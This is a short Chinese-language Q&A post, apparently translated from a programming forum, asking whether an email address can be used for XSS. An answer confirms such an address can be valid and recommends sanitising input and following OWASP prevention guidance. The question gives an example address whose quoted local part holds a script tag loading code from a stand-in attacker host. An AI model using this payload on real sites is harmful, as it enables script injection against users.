我想知道电子邮件地址是否可以用于XSS攻击。
我们假设有一个网站可以注册并提供他的电子邮件地址。如果想要攻击给定的网站,他或她可能会创建一个电子邮件地址,例如:
"<script src=//my.evil.site/is/attacking/u.js></script>"@stmpname.com
然后使用此电子邮件地址攻击网站。
电子邮件地址中是否允许使用引号或脚本标记?
答案 0 :(得分:5)
示例中的电子邮件地址似乎有效。 异常的唯一字符是引用" - 其他字符有效。
Wikipedia表示您指定的电子邮件地址有效。
您需要确保在呈现之前对任意用户输入进行清理。
首先,您可能需要参考有关XSS的prevention和OWASP的信息。